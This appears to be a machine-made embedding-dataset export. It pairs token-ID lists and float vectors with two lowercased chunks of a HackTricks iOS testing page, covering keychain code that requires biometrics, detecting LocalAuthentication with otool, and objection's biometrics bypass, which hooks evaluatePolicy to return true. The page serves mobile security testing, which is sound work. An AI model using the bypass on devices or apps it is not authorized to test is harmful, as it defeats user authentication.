1033, 1027, 1000, 27593, 3022, 2361, 4070, 1000, 2004, 12935, 3367, 4892, 4226, 2854, 1031, 29535, 8586, 10175, 5657, 2850, 2696, 2004, 5164, 1033, 1027, 1000, 3231, 1035, 2844, 1035, 20786, 1000, 1012, 2951, 1006, 2478, 1024, 1012, 21183, 2546, 2620, 1007, 999, 2004, 12935, 2850, 2696, 4226, 2854, 1031, 29535, 19281, 4779, 22648, 9623, 9363, 3372, 13153, 2004, 5164, 1033, 1027, 3229, 8663, 13181, 2140, 1013, 1013, 1017, 1012, 3828, 8875, 7485, 3570, 1027, 10819, 4221, 25666, 2094, 1006, 23032, 2004, 12935, 29201, 3258, 5649, 1010, 9152, 2140, 1007, 2065, 3570, 1027, 1027, 2053, 2121, 2099, 1063, 1013, 1013, 5147, 5552, 1065, 2842, 1063, 1013, 1013, 7561, 2096, 7494, 1065, 1013, 1013, 1015, 1012, 3443, 3229, 8663, 13181, 2140, 4874, 2008, 2097, 5050, 27280, 10906, 12935, 2121, 29165, 2890, 2546, 1008, 9413, 2099, 1027, 9152, 2140, 1025, 10819, 6305, 9623, 9363, 3372, 13153, 2890, 2546, 17266, 2890, 2546, 1027, 10819, 6305, 9623, 9363, 3372, 13153, 16748, 3686, 24415, 10258, 26454, 1006, 21117, 13976, 24755, 4263, 3207, 7011, 11314, 1010, 29535, 19281, 4779 ]
hack_tricks
43.txt
21
##raccessiblewhenpasscodesetthisdeviceonly, ksecaccesscontroluserpresence, err ) ; / / 2. define keychain services query. pay attention that ksecattraccesscontrol is mutually exclusive with ksecattraccessible attribute nsdictionary * query = @ { ( _ _ bridge id ) ksecclass : ( _ _ bridge id ) ksecclassgenericpassword, ( _ _ bridge id ) ksecattrlabel : @ " com. me. myapp. password ", ( _ _ bridge id ) ksecattraccount : @ " owasp account ", ( _ _ bridge id ) ksecvaluedata : [ @ " test _ strong _ password " datausingencoding : nsutf8stringencoding ], ( _ _ bridge id ) ksecattraccesscontrol : ( _ _ bridge _ transfer id ) sacref } ; / / 3. save item osstatus status = secitemadd ( ( _ _ bridge cfdictionaryref ) query, nil ) ; if ( status = = noerr ) { / / successfully saved } else { / / error while saving } now we can request the saved item from the keychain. keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not. swiftobjective - c / / 1. define queryvar query = [ string : any ] ( ) query [ ksecclass as string ] = ksecclassgenericpasswordquery [ ksecreturndata as string ] = kcfbooleantruequery [ ksecattraccount as string ] = " my name " as cfstringquery [ ksecattrlabel as string ] = " com. me. myapp. password " as cfstringquery [ ksecuseoperationprompt as string ] = " please, pass authorisation to enter this area " as cfstring / / 2. get itemvar queryresult : anyobject? let status = withunsafemutablepointer ( to : & queryresult ) { secitemcopymatching ( query as cfdictionary, unsafemutablepointer ( $ 0 ) ) } if status = = noerr { let
[ 0.18232205510139465, -0.34117603302001953, -0.16130182147026062, 1.2713252305984497, -0.2662045359611511, -0.06750701367855072, -0.45715317130088806, 0.37156665325164795, 0.11618292331695557, 0.4992528259754181, -0.09129330515861511, -0.17597293853759766, -0.38026294112205505, -0.24702616035938263, -1.1555898189544678, 0.008645633235573769, -0.5502908825874329, 0.005807790439575911, -0.6070716977119446, -0.11535022407770157, 0.6995325684547424, 0.7578514218330383, -1.063704252243042, -0.09534822404384613, -0.3248288333415985, 1.21642005443573, 0.2581484019756317, -0.02312115952372551, 0.5991196036338806, 1.1557719707489014, 0.12167206406593323, 0.005373744294047356, 0.14636573195457458, -0.43353140354156494, -0.24412581324577332, -0.7345066070556641, 1.0912482738494873, -0.4230292737483978, 0.40692466497421265, -0.24208417534828186, 0.17924989759922028, -0.03043099120259285, 0.19757600128650665, -0.3867751955986023, -0.4165476858615875, -0.044358089566230774, 0.21112222969532013, -0.3840187191963196, 0.27624213695526123, -0.3383210003376007, 0.31872954964637756, -0.07889068126678467, -0.16449694335460663, 0.24477270245552063, 0.2714693546295166, 0.06549748033285141, 0.1424955129623413, -0.27824023365974426, 0.11446181684732437, 0.14822761714458466, -0.25749337673187256, 0.5686649084091187, 0.3818478584289551, -1.2083147764205933, -0.25850623846054077, -0.05698883906006813, 0.4231131672859192, -0.5548582077026367, 0.07022228091955185, -0.5284309387207031, -0.02617032825946808, 0.17583675682544708, -0.6397750377655029, -0.8490298390388489, -0.4912847876548767, 0.008441351354122162, 0.045264437794685364, -0.2856917679309845, 0.4861086905002594, 0.789426863193512, 0.1561909019947052, 0.5441336035728455, 0.4411119818687439, -0.5438544750213623, -0.07558409124612808, 0.24029415845870972, 0.26455041766166687, 0.7316381335258484, 0.07297387719154358, 0.09950026124715805, -0.09559299051761627, 0.5420472621917725, -0.5559148192405701, -0.5972379446029663, 0.7154066562652588, 0.847845733165741, -0.5344937443733215, -0.2894469201564789, 0.4231117367744446, -0.4921676516532898, 0.26129794120788574, -0.16052557528018951, 0.02369334176182747, 0.7964921593666077, -0.31415292620658875, 0.9378656148910522, 0.4536855220794678, -0.2891820967197418, 0.10997676104307175, -0.1348811835050583, -0.023056218400597572, -0.6026507616043091, 0.4871373176574707, -0.8697421550750732, -0.8042330145835876, 0.6667836308479309, 0.6602932810783386, 0.27758824825286865, -0.15781795978546143, 0.6761897206306458, 0.04778602346777916, 0.10091625899076462, 0.7106737494468689, 0.0775056928396225, 0.9053064584732056, -0.496343195438385, 0.8251489400863647, 0.04668877646327019, -0.5575660467147827, -0.386773020029068, -0.22651398181915283, 0.0006724682752974331, 0.37735801935195923, 0.48772382736206055, -0.6945213079452515, 0.038198091089725494, 0.4053398370742798, 0.2382560670375824, 0.5800013542175293, -0.5286239981651306, -0.45053422451019287, 0.3485790491104126, 0.45342814922332764, 1.1706241369247437, 0.5670241117477417, -0.504891037940979, -0.46094441413879395, 0.20773465931415558, -1.1145771741867065, -0.2615237236022949, -0.09426514804363251, 0.3110485374927521, 0.24893952906131744, -0.08836327493190765, -0.1809251606464386, -0.3077448308467865, -0.6306387186050415, -0.15188191831111908, -0.5528983473777771, -0.3061734437942505, -0.7654614448547363, 0.8039689660072327, -0.17725113034248352, 0.3814549148082733, -0.35301023721694946, 0.20763225853443146, -0.36751705408096313, -0.005903486628085375, -0.37865033745765686, -0.7051571607589722, -0.006570019759237766, 0.18457433581352234, 0.2392812967300415, 0.12445605546236038, 0.7493764758110046, 0.5987238883972168, -0.13672330975532532, 0.01593172550201416, 0.035578884184360504, 0.6395256519317627, -0.21811598539352417, -0.18393957614898682, 0.1371169239282608, 1.3461025953292847, 0.37697988748550415, 0.0006158009637147188, -0.4404231011867523, -0.43200060725212097, -0.2975706160068512, -0.2680073082447052, -0.4024044871330261, 0.587771475315094, -0.3245980143547058, 0.7523308992385864, 0.365584135055542, 0.16099321842193604, -1.4529932737350464, -0.15176451206207275, -0.18116852641105652, -0.941491961479187, -0.328154057264328, 0.5722583532333374, 0.19155095517635345, 0.7185496091842651, -0.2756883203983307, -0.3996586203575134, 1.1316264867782593, 0.5183048844337463, -0.24258960783481598, 0.444803386926651, 0.32228824496269226, 0.4514312744140625, -0.41914841532707214, -0.018830744549632072, 0.22249504923820496, -0.05644948408007622, -0.9841561317443848, 1.0287472009658813, -0.25464192032814026, 0.4927178621292114, 0.12532736361026764, 0.6943761110305786, 0.5300573110580444, 0.6481953263282776, -0.6122707724571228, -0.5120697021484375, 0.46161362528800964, 0.5555997490882874, -0.6427097320556641, 0.1392775923013687, 0.17029720544815063, 0.877036988735199, 0.18115633726119995, 0.5519322156906128, 0.23989400267601013, -0.03714066743850708, 0.2950560748577118, 0.46358031034469604, 0.6671151518821716, 0.16861648857593536, -0.2578966021537781, 0.2549365162849426, 0.8899831771850586, 0.7232305407524109, 0.257110595703125, -0.15320579707622528, 0.1918734610080719, -0.21611613035202026, 0.3982435166835785, 0.5887880921363831, 0.24860647320747375, 1.0239092111587524, 0.18914034962654114, 0.08409769833087921, -0.7580297589302063, -0.41709351539611816, 0.7356069087982178, 0.8580742478370667, -0.6510934829711914, -0.705991804599762, 0.004846823867410421, 0.10004712641239166, -0.28682568669319153, -0.24729958176612854, -0.3093204200267792, 0.622445285320282, -0.24031856656074524, 0.14442159235477448, -0.5905202031135559, -0.8553849458694458, -0.8708658218383789, -0.5468446612358093, -0.3587106466293335, -0.3490044176578522, -0.22241203486919403, -0.009054132737219334, 0.44181808829307556, -0.1123940721154213, 0.7097647786140442, -0.7771507501602173, -0.6855430603027344, 0.14470292627811432, 0.07643267512321472, 0.488864928483963, -0.21066449582576752, 0.22604592144489288, -1.1230521202087402, 0.4943798780441284, 0.47151148319244385, 0.6106213331222534, -0.2533186674118042, -0.16421277821063995, 0.20314164459705353, -0.1772000938653946, 0.11965793371200562, -0.6857526302337646, 0.3805091083049774, 0.8713430166244507, -0.6054068803787231, -0.5776923894882202, 0.6849815845489502, -0.31814852356910706, 0.24348969757556915, 0.34178081154823303, -0.5032678842544556, 0.41080325841903687, 0.2531241476535797, 0.3821844458580017, 0.8623671531677246, 0.6391577124595642, -0.6900913715362549, 0.49936503171920776, -0.04812581092119217, 0.13391980528831482, -0.890112042427063, 0.5856150388717651, 0.8996488451957703, 0.09578349441289902, 0.022386521100997925, -0.15943919122219086, -0.5450932383537292, -0.42709288001060486, -0.3335193991661072, -0.14360374212265015, 0.3399505019187927, 0.21027182042598724, -0.4104492664337158, -0.8744128346443176, 0.37290307879447937, -0.6332642436027527, -0.7250319123268127, -0.5797239542007446, -0.38612836599349976, 0.4851624667644501, 0.20354439318180084, 0.12674808502197266, 0.31067579984664917, -0.5222151279449463, 0.6525840759277344, 0.37516188621520996, 0.1673523634672165, 0.10534090548753738, 0.20288486778736115, -0.06860444694757462, -0.3987761437892914, 0.3695654273033142, 0.5778955817222595, -0.004327740520238876, -0.6504348516464233, -0.021445946767926216, -0.41810011863708496, -0.21048705279827118, 0.1806890070438385, 0.12001609057188034, 0.43599560856819153, 1.0537750720977783, -0.28418126702308655, -0.22285638749599457, 0.06946590542793274, 0.7192057371139526, -0.08420627564191818, -0.4502966105937958, -0.17308127880096436, -0.324903666973114, 0.05469101294875145, -0.623275876045227, 0.2660510241985321, 0.708638072013855, 0.609015703201294, -0.032188624143600464, 0.6949086785316467, -0.18455183506011963, 0.07570300251245499, 0.14526067674160004, -0.6966139078140259, -0.9449537396430969, 0.6338502168655396, -0.29778674244880676, 0.693071186542511, -0.27801713347435, 0.2378021478652954, -0.23830482363700867, 0.13114774227142334, 0.5513281226158142, 0.8576663732528687, -0.46730223298072815, -0.3098982274532318, 0.226206436753273, -0.20763638615608215, -0.6756349205970764, 0.5691751837730408, -0.08344677090644836, 0.14469943940639496, -0.8485277891159058, -0.676094114780426, -0.19073137640953064, -0.055592749267816544, 0.21883083879947662, 0.6335800886154175, 0.1246008425951004, 0.2433416247367859, 0.5027905702590942, 0.10638399422168732, 1.0774691104888916, -0.8631120920181274, 0.42274853587150574, -0.50847327709198, 1.1215448379516602, -0.0497501902282238, 0.14552104473114014, -0.22545869648456573, -0.0386781245470047, -0.49250128865242004, 0.23585642874240875, 0.3603161871433258, -0.12151896953582764, -0.841516375541687, -0.2759137451648712, 0.1317063421010971, 0.01816871203482151, -0.6446447372436523, -0.39181089401245117, 0.22674910724163055, 0.3528890907764435, 0.618044912815094, -0.5556605458259583, -0.24580685794353485, -1.0711323022842407, -0.12201079726219177, -0.3629424273967743, -0.4609406888484955, -0.5171511769294739, -0.3761964440345764, -0.5151141881942749, -0.6103576421737671, -0.5175537467002869, 0.40231186151504517, 0.21614426374435425, 0.08673728257417679, -0.8928313851356506, 0.17512264847755432, 0.5983144640922546, -0.22159674763679504, -0.8316198587417603, -0.1394508183002472, 0.4954216778278351, 0.10106142610311508, 0.8269866704940796, -0.3349597752094269, -0.7307579517364502, -0.13392584025859833, -0.8271928429603577, 0.8072251677513123, -0.3195759057998657, 0.11141054332256317, 0.2362760603427887, -0.021789731457829475, 0.28650620579719543, 0.44197097420692444, -0.453489750623703, 0.3113804757595062, 0.15781602263450623, 0.0015579878818243742, -0.41371652483940125, -0.2178322672843933, 0.7478203773498535, 0.16079232096672058, -0.23438367247581482, 0.2930612862110138, 0.25047075748443604, 0.21994850039482117, 0.6011602878570557, -0.5330113768577576, -0.6060631275177002, 0.24587881565093994, -0.5649131536483765, 0.844086766242981, 0.1830894649028778, 0.10467563569545746, 0.21097329258918762, -0.41326549649238586, 0.8385663628578186, 0.1459633857011795, 0.6032777428627014, -0.7554523944854736, -0.5849904417991638, 0.28811925649642944, 0.1686563789844513, 0.31718653440475464, 0.35671794414520264, 0.14216992259025574, -0.3679448366165161, -0.5032598972320557, -0.3967948853969574, -0.8301273584365845, -1.0950833559036255, -0.6303365230560303, 0.06769634038209915, 0.014152114279568195, -0.16606785356998444, 0.21112878620624542, 0.03299231454730034, -0.5703200697898865, 0.7062650322914124, 0.2924818992614746, 0.07095199823379517, -0.8738066554069519, -0.02113119326531887, -0.7857376337051392, -0.27925747632980347, -0.2511346638202667, 0.8765966892242432, 0.2893025577068329, -0.515350341796875, 0.44791465997695923, 0.720039427280426, 0.0017304026987403631, 0.31826040148735046, 0.2756826877593994, 0.45896339416503906, 0.7638713121414185, -0.6314078569412231, 0.02365637943148613, 1.0828191041946411, -0.17722569406032562, 0.07944701611995697, -0.1586950570344925, 0.14373250305652618, -0.7456454634666443, -0.5042558908462524, 0.10933363437652588, -0.05561672896146774, -0.22182518243789673, -0.21711096167564392, -0.5388745069503784, -0.213988795876503, 0.4107581675052643, -0.2792513966560364, -0.5563089847564697, -0.2540541887283325, -0.3616071343421936, -0.1949942708015442, -0.3869282901287079, -0.5178676247596741, -0.6004794239997864, -0.5325297713279724, 0.0176493301987648, 0.38512852787971497, 0.16723482310771942, 0.6919400095939636, -0.4458673596382141, -0.24922625720500946, 0.07446053624153137, -0.3644702732563019, -0.42684102058410645, -0.7115601897239685, -0.2692703306674957, 0.5373182892799377, -0.002585509093478322, 0.5732905268669128, -0.719986081123352, 0.4193209111690521, -0.3251746594905853, 0.25237563252449036, -0.6403217315673828, -0.38344472646713257, -0.3278452157974243, 0.36459264159202576, 0.6383275985717773, -0.4188424050807953, -0.34904658794403076, 0.5809924602508545, 0.09102107584476471, -0.11522316932678223, 0.005519635044038296, -0.5628519058227539, 0.09932073950767517, -0.9437363743782043, -1.4990363121032715, 0.20280911028385162, 0.18209372460842133, -0.05336786061525345, -0.24504587054252625, 0.011652124114334583, 0.39740005135536194, 0.05048467963933945, 0.08995115756988525, 0.8608452081680298, -0.07471093535423279, 0.3584097623825073, -0.9031157493591309, 0.15916506946086884, 0.48635247349739075, -0.17391303181648254, 0.08333548158407211, -0.21079958975315094, -0.0381823293864727, -0.2593001127243042, -0.17151008546352386, -0.27171894907951355, -0.4158139228820801, -0.20335161685943604, 0.4397364556789398, -0.17881397902965546, 0.6858676075935364, -0.5486247539520264, -0.9957566261291504, -0.36377379298210144, -0.2428380697965622, 0.1244255006313324, -0.2626015841960907, 0.4149338901042938, 0.37421199679374695, -0.4217824637889862, -0.8509499430656433, -0.0542459636926651, 0.029888782650232315, -0.18068011105060577, 0.6705701947212219, 0.310604065656662, -0.5357511043548584, 1.1012918949127197, 0.33956003189086914, -0.87922203540802, -0.5930047631263733, -0.03855971246957779, -0.754295289516449, 0.0885743796825409, -0.21914945542812347, -0.39416050910949707, 0.4537275433540344, 0.5519261956214905, -0.17499931156635284, 0.30796629190444946, 0.19530630111694336, 0.199853777885437, -0.6243006587028503, 0.5544342994689941, -0.286467045545578, -0.1612812578678131, 0.9879940748214722, -0.6540752649307251, -0.4349171221256256, -0.9717105627059937, -0.16903136670589447, 0.5100729465484619, 0.07777046412229538, 0.865965723991394, 0.05269601196050644, 0.011473015882074833, -0.3327656686306, -0.5707454085350037, 0.8646193742752075, -0.04729464277625084, 0.15344469249248505, 1.4064407348632812, 0.17012812197208405, -0.16822576522827148, -0.2976668179035187, 0.11174201220273972, -0.0018359271343797445, -0.3921792507171631, -1.069376826286316, 0.18969082832336426, 0.34065693616867065, 0.26637551188468933, -0.3741188049316406, -0.12455423921346664, -0.5245619416236877, -1.1463556289672852, -0.46323639154434204, -0.3329920768737793, -0.35439011454582214, -0.04578152671456337, 0.43585047125816345, 0.13707393407821655, -0.1028694286942482, 0.03598356246948242, 0.5639181137084961, -0.7083494067192078, -0.004316964652389288, -0.290050208568573, 0.3588928282260895, -0.8798379302024841, -0.9693810343742371, -0.5626972913742065, -0.010781140066683292, -0.6237180233001709, -0.9226176142692566, -0.8002610802650452, 0.11814583837985992, -0.7193485498428345, 0.13672803342342377, -0.9232314825057983, 0.0902591347694397, -0.49436208605766296, -0.7342445254325867, 0.7576233148574829, 0.7008678913116455, -0.15757709741592407, 0.04847230389714241, 0.13828565180301666, 0.1766541600227356, 0.2039875090122223, -0.1279279589653015, -0.46789005398750305, -0.19015541672706604, 0.35100868344306946, 0.3299838900566101, 0.34811845421791077, -0.3775288462638855, 0.2734815180301666, -0.302812397480011, -0.6017388701438904, -0.07577018439769745, -0.524908721446991, -0.3191986083984375, 0.4106166362762451, -0.2860461175441742, 0.32279151678085327, 0.5143705606460571, 0.8467261791229248, 1.0057896375656128, -0.4270932376384735, 0.9928424954414368, 0.6571004986763, 0.21758899092674255, -0.4764570891857147, 0.5561785101890564, 0.14907878637313843, -0.7091101408004761, 0.406175434589386, 0.016990244388580322, -0.47608160972595215, 0.1892772614955902, -0.24703317880630493, -0.38755279779434204, -1.0377137660980225, -0.22453755140304565, 0.26209014654159546, 0.6813689470291138, 0.8018001317977905, -0.13043972849845886, 0.35329923033714294, -0.06266842037439346, -0.7579190731048584, -0.05112387612462044, -1.0040149688720703, -0.7121200561523438, -0.1328265219926834, 0.08755325525999069, -0.46208468079566956, -0.8614354133605957, -0.05061228200793266, 0.15147650241851807, 0.03713645786046982, 0.20901599526405334, 0.29520878195762634, 0.3555871546268463, 0.014509967528283596, 0.515720784664154, 0.07028715312480927, -0.3059157431125641, -0.1711316555738449, 0.7734897136688232, -0.7911747097969055, -1.4317474365234375, 0.18733792006969452, 0.6969048976898193, 0.9320288300514221, 0.16016876697540283, -0.6572815179824829, 0.2241077721118927, 0.6834622621536255, -0.477138489484787, -0.2055906504392624, 0.25534868240356445, -0.922223687171936, 0.32783055305480957, -0.36708319187164307, 0.24282103776931763, -0.24380216002464294, -0.46012845635414124, 0.3051564395427704, -0.28552716970443726, -0.6814233660697937, 0.03316616639494896, -0.21759355068206787, -0.23786741495132446, 0.6727529168128967, 0.6991669535636902, 0.10300978273153305, -0.3220566213130951, -0.15854458510875702, -0.5072699189186096, 0.3202779293060303, 0.6434771418571472, 0.3293042480945587, 0.0752934068441391, 0.1242116242647171, 0.3706865906715393, 0.14169169962406158, -0.40607011318206787, 0.545417308807373, 0.2732154130935669, -0.30833491683006287, 0.3270415961742401, 0.27199724316596985, 0.0770513117313385, -0.18767492473125458, -0.21871036291122437, -0.07239595055580139, -0.04516955465078354, 0.15806488692760468, 0.3280089795589447, -0.43141302466392517, 0.9689366817474365, -0.5089590549468994, 0.5317224264144897, -0.46342459321022034, -0.18130901455879211, -0.04834457114338875, -0.16489967703819275, -0.48517414927482605, 0.4215943217277527, 0.8488396406173706, 0.3133718967437744, 0.7719064354896545, 0.23567022383213043, -0.8392041325569153, -0.08542664349079132, 0.631339430809021, -0.6722882390022278, -0.3330588936805725, 0.22449184954166412, 0.04657313600182533, -0.7513805031776428, -0.4609403908252716, 0.633319616317749, 0.18385255336761475, 0.3530369699001312, 0.3612571060657501, 0.20912392437458038, 0.3425702452659607, -0.01850016973912716, 0.5389885902404785, 0.025865977630019188, -0.09636920690536499, 0.09788835793733597, 0.27356529235839844, -0.9726623296737671, 0.8013809323310852, -0.09016116708517075, 0.708213210105896, 0.48143619298934937, 0.5635765790939331, -0.3979531526565552, 0.35333487391471863, -0.3418121337890625, -0.20004715025424957, -0.5127691626548767, 0.2020338922739029, 0.025813592597842216, -0.4873649775981903, 0.0055060056038200855, 0.23688839375972748, 0.23819376528263092, -0.33176299929618835, -0.2803114354610443, -0.8136832118034363, 0.04280851408839226, -0.16788987815380096, -0.53034508228302, 0.2890006899833679, -0.13244085013866425, -0.5713782906532288, 0.351254940032959, 0.007918250747025013, 0.6517637968063354, 0.3100108206272125, -0.6331705451011658, -0.9509918093681335, -0.22385846078395844, 0.5083745718002319, 0.0023350019473582506, 0.5679830312728882, -0.1186671257019043, -0.4237426221370697, -0.050788603723049164, -0.990226686000824, -0.6519230008125305, 0.12053263187408447, -0.0997728779911995, -0.4391799569129944, 0.09438153356313705, 0.5171619653701782, 0.6911119818687439, 0.2510582506656647, -0.5106788277626038, -0.06236344575881958, 0.3031383156776428, 0.8842359185218811, -0.7841992974281311, 0.901466965675354, 0.3202420473098755, 0.08741220086812973, 0.3846610188484192, 0.1844419538974762, 0.48392927646636963, -0.515969455242157, -0.3316093683242798, 0.0313885323703289, 0.22549936175346375, -0.3319186270236969, -0.14064142107963562, 0.26192009449005127, -0.374630331993103, 0.0024208701215684414, -0.19138137996196747, -0.6234092712402344, 0.2312803417444229, -0.9230759739875793, 0.5999161005020142, -0.07771668583154678, 0.1511228233575821, 0.4018305540084839, -0.016910763457417488, 0.7700905203819275, -1.3099896907806396, 4.355684280395508, 0.7840635776519775, 0.2398717850446701, 0.5248161554336548, 0.36861783266067505, 1.1201248168945312, 1.0222703218460083, -0.4932812750339508, 0.17365583777427673, -0.2654402554035187, 0.06981570273637772, -0.24238787591457367, 0.5503717064857483, -0.2361731380224228, -0.22546544671058655, 0.15997448563575745, -0.861050009727478, 0.16825337707996368, 0.42276185750961304, -1.0652179718017578, -0.9132053852081299, 0.2393742799758911, -0.2632823884487152, 1.1393442153930664, 0.2198486328125, 0.007269888184964657, -0.026819920167326927, -0.7353649139404297, -0.15802212059497833, -0.05023636296391487, 0.27227458357810974, -0.5878803133964539, 0.2330389767885208, -0.5867106914520264, -0.26734814047813416, 0.13047143816947937, 0.5003628134727478, -0.7395573258399963, -0.48483598232269287, 0.2925015985965729, 0.601720929145813, -0.08143675327301025, 0.05209849402308464, -0.5277310013771057, 0.5552144646644592, 0.3677220940589905, -0.8083062767982483, 0.50784832239151, 0.6198609471321106, -0.881909191608429, 0.703015923500061, -0.2400428056716919, 0.6169925928115845, -0.5759809613227844, -0.3748187720775604, -0.303803026676178, 0.5118645429611206, -0.31300055980682373, 0.21046742796897888, -0.2827260196208954, 0.2891440689563751, -0.0846499353647232, 0.17496617138385773, -0.0817812830209732, -0.95232093334198, 0.9936953783035278, 0.22414390742778778, 0.1597985327243805, -0.04799550026655197, -0.1349448710680008, -0.43945589661598206, -0.8149541616439819, -0.5461063385009766, -0.46859145164489746, 0.7060219049453735, -0.55968177318573, -0.18272432684898376, 0.7192456722259521, 0.97361820936203, -0.3263399600982666, -0.3606569766998291, -0.09201156347990036, -0.9822467565536499, 0.6743146777153015, 0.496928870677948, 0.8948258757591248, -0.028101518750190735, -0.6839221119880676, 0.08078256249427795, 0.45036783814430237, 0.15046457946300507, 0.2270103096961975, -0.7509810924530029, -0.08795081079006195, 0.3891971707344055 ]
[ 22648, 9623, 19307, 2860, 10222, 15194, 23237, 6582, 24158, 24844, 6610, 2239, 2135, 1010, 29535, 19281, 9468, 7971, 8663, 13181, 7393, 2121, 28994, 10127, 1010, 9413, 2099, 1007, 1025, 1013, 1013, 1016, 1012, 9375, 3145, 24925, 2078, 2578, 23032, 1012, 3477, 3086, 2008, 29535, 19281, 4779, 22648, 9623, 9363, 3372, 13153, 2003, 20271, 7262, 2007, 29535, 19281, 4779, 22648, 9623, 19307, 17961, 24978, 29201, 3258, 5649, 1008, 23032, 1027, 1030, 1063, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 26266, 1024, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 26266, 6914, 22420, 15194, 18351, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 19281, 4779, 12190, 16336, 2140, 1024, 1030, 1000, 4012, 1012, 2033, 1012, 2026, 29098, 1012, 20786, 1000, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 19281, 4779, 22648, 3597, 16671, 1024, 1030, 1000, 27593, 3022, 2361, 4070, 1000, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 8586, 10175, 5657, 2850, 2696, 1024, 1031, 1030, 1000, 3231, 1035, 2844, 1035, 20786, 1000, 2951, 18161, 2368, 3597, 4667, 1024, 24978, 4904, 2546, 2620, 3367, 4892, 2368, 3597, 4667, 1033, 1010, 1006, 1035, 1035, 2958, 8909, 1007, 29535, 19281, 4779, 22648, 9623, 9363, 3372, 13153, 1024, 1006, 1035, 1035, 2958, 1035, 4651, 8909, 1007, 17266, 2890, 2546, 1065, 1025, 1013, 1013, 1017, 1012, 3828, 8875, 9808, 9153, 5809, 3570, 1027, 10819, 4221, 25666, 2094, 1006, 1006, 1035, 1035, 2958, 12935, 29201, 3258, 5649, 2890, 2546, 1007, 23032, 1010, 9152, 2140, 1007, 1025, 2065, 1006, 3570, 1027, 1027, 2053, 2121, 2099, 1007, 1063, 1013, 1013, 5147, 5552, 1065, 2842, 1063, 1013, 1013, 7561, 2096, 7494, 1065, 2085, 2057, 2064, 5227, 1996, 5552, 8875, 2013, 1996, 3145, 24925, 2078, 1012, 3145, 24925, 2078, 2578, 2097, 2556, 1996, 27280, 13764, 8649, 2000, 1996, 5310, 1998, 2709, 2951, 2030, 9152, 2140, 5834, 2006, 3251, 1037, 7218, 4344, 16550, 2001, 3024, 2030, 2025, 1012, 9170, 16429, 20614, 3512, 1011, 1039, 1013, 1013, 1015, 1012, 9375, 23032, 10755, 23032, 1027, 1031, 5164, 1024, 2151, 1033, 1006, 1007, 23032, 1031, 29535, 8586, 26266, 2004, 5164, 1033, 1027, 29535, 8586, 26266, 6914, 22420, 15194, 18351, 4226, 2854, 1031, 29535, 8586, 13465, 14287, 2850, 2696, 2004, 5164, 1033, 1027, 21117, 26337, 13669, 11219, 16344, 5657, 4226, 2854, 1031, 29535, 19281, 4779, 22648, 3597, 16671, 2004, 5164, 1033, 1027, 1000, 2026, 2171, 1000, 2004, 12935, 3367, 4892, 4226, 2854, 1031, 29535, 19281, 4779, 12190, 16336, 2140, 2004, 5164, 1033, 1027, 1000, 4012, 1012, 2033, 1012, 2026, 29098, 1012, 20786, 1000, 2004, 12935, 3367, 4892, 4226, 2854, 1031, 29535, 8586, 8557, 25918, 3370, 21572, 27718, 2004, 5164, 1033, 1027, 1000, 3531, 1010, 3413, 3166, 6648, 2000, 4607, 2023, 2181, 1000, 2004, 12935, 3367, 4892, 1013, 1013, 1016, 1012, 2131, 8875, 10755, 23032, 6072, 11314, 1024, 2151, 16429, 20614, 1029, 2292, 3570, 1027, 2007, 4609, 3736, 7959, 28120, 3085, 8400, 2121, 1006, 2000, 1024, 1004, 23032, 6072, 11314, 1007, 1063, 10819, 4221, 12458, 7361, 24335, 4017, 8450, 1006, 23032, 2004, 12935, 29201, 3258, 5649, 1010, 25135, 28120, 3085, 8400, 2121, 1006, 1002, 1014, 1007, 1007, 1065, 2065, 3570, 1027, 1027, 2053, 2121, 2099, 1063, 2292 ]
hack_tricks
43.txt
22
password = string ( data : queryresult as! data, encoding :. utf8 )! / / successfully received password } else { / / authorization not passed } / / 1. define querynsdictionary * query = @ { ( _ _ bridge id ) ksecclass : ( _ _ bridge id ) ksecclassgenericpassword, ( _ _ bridge id ) ksecreturndata : @ yes, ( _ _ bridge id ) ksecattraccount : @ " my name1 ", ( _ _ bridge id ) ksecattrlabel : @ " com. me. myapp. password ", ( _ _ bridge id ) ksecuseoperationprompt : @ " please, pass authorisation to enter this area " } ; / / 2. get itemcftyperef queryresult = null ; osstatus status = secitemcopymatching ( ( _ _ bridge cfdictionaryref ) query, & queryresult ) ; if ( status = = noerr ) { nsdata * resultdata = ( _ _ bridge _ transfer nsdata * ) queryresult ; nsstring * password = [ [ nsstring alloc ] initwithdata : resultdata encoding : nsutf8stringencoding ] ; nslog ( @ " % @ ", password ) ; } else { nslog ( @ " something went wrong " ) ; } detectionusage of frameworks in an app can also be detected by analyzing the app binary's list of shared dynamic libraries. this can be done by using otool : $ otool - l < appname >. app / < appname > if localauthentication. framework is used in an app, the output will contain both of the following lines ( remember that localauthentication. framework uses security. framework under the hood ) : / system / library / frameworks / localauthentication. framework / localauthentication / system / library / frameworks / security. framework / securityif security. framework is used, only the second one will be shown. local authentication framework bypassobjectionobjection biometrics bypass can be used to bypass localauthentication. objection uses frida to instrument the evaluatepolicy function so that it returns true even if authentication was not successfully performed. use the ios ui biometrics _ bypass command to bypass
[ 0.8575355410575867, -0.21013985574245453, -0.009848895482718945, 0.7867982983589172, -0.5784406661987305, -0.02678816393017769, -0.06879138201475143, 0.04330151528120041, -0.13997811079025269, 0.5986763834953308, -0.06435989588499069, -0.04793638363480568, 0.05071324482560158, -0.3289230465888977, -0.8199189901351929, 0.035766396671533585, -0.5906996130943298, -0.1986459493637085, -0.7157256007194519, -0.0978822410106659, 0.08055490255355835, 0.4501873254776001, -1.0801160335540771, -0.5508856177330017, -0.4134197235107422, 0.9646437168121338, 0.5965501666069031, 0.07389345020055771, 0.2728066146373749, 0.6771404147148132, -0.053465403616428375, 0.20866921544075012, 0.021328510716557503, -0.07657018303871155, -0.14308136701583862, -0.539860188961029, 0.8701698184013367, -0.2079894095659256, 0.2131507843732834, -0.6096777319908142, -0.06603127717971802, 0.12289304286241531, -0.08385518193244934, -0.581581711769104, -0.28328385949134827, -0.5345828533172607, -0.05915641412138939, -0.7135373950004578, 0.12786364555358887, -0.10010401159524918, 0.350107342004776, -0.18349827826023102, -0.22043323516845703, 0.30675414204597473, 0.5439844727516174, 0.1786036491394043, -0.14943504333496094, -0.20685642957687378, -0.36208128929138184, 0.22645772993564606, 0.16290007531642914, 